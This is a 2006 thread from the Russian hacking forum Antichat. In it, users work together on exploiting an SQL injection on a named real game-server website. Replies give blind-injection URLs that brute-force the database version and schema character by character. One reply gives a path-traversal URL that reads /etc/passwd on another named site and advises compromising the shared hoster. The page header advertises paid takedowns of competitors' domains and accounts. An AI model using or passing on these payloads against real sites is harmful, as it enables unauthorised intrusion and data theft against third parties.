Форум АНТИЧАТ - Помогите пожалуйста со сложной Mssql инъекцией.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Помогите пожалуйста со сложной Mssql инъекцией.

Опции темы

Поиск в этой теме

Опции просмотра

Помогите пожалуйста со сложной Mssql инъекцией.

11.12.2006, 13:58

vmn

Познающий

Регистрация: 16.10.2006

Сообщений: 82

Провел на форуме:
248469

Репутация: 33

Помогите пожалуйста со сложной Mssql инъекцией.

Собственно нашел одну инъекцию:
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=2--
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=1--

Юнион селект не хочет делать, через ; тоже не получается. Есть ли возможность исполнять команды типа update или возможность сделать select? Заранее спасибо.

11.12.2006, 14:17

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

читай http://rst.void.ru/papers/mysql_char_brute.txt
подбирай и перебирай через substring..
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring(@@version,1,1))>100)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring(@@version,1,1))>1)--

http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+information_schema.tabl es',1,1))>120)--
http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+information_schema.tabl es',1,1))>1)--

__________________
ПИУ-ПИУ...

Последний раз редактировалось c411k; 11.12.2006 в 14:20..

11.12.2006, 19:51

vmn

Познающий

Регистрация: 16.10.2006

Сообщений: 82

Провел на форуме:
248469

Репутация: 33

update никак не получится сделать? кстати в выражении http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')+and(ascii(su bstring('select+top+1+from+in formation_schema.tables',1,1))>1)-- нет смысла, так как селект не вычисляется - ты задал его в виде строковой константы. То есть substring('select+top+1+from+information_schema.ta bles',1,100) = 'select+top+1+from+information_schema.tables'

Последний раз редактировалось vmn; 11.12.2006 в 19:58..

11.12.2006, 19:56

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Отправить сообщение для _Great_ с помощью ICQ

Цитата:

Юнион селект не хочет делать,

А ты поля перебирал?

Цитата:

update никак не получится сделать?

нет

11.12.2006, 20:27

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

http://la2shop.net/index.php?val=../../../../../../etc/passwd
На том же ip см. титли.
Вообще 1gb.ru дырявый до ужоса там винда права поднять банально ломай через хостинг

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ПомогитЕ !!! подалуста найти кряк	гейлордфакерЪ	Болталка	2	30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!!	farik.aka	E-Mail	1	17.09.2006 13:00
Помогите пожалуйста!	tclover	Болталка	13	25.02.2006 19:36
Пожалуйста помогите срочно!	Бурундукан	E-Mail	13	07.02.2005 12:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход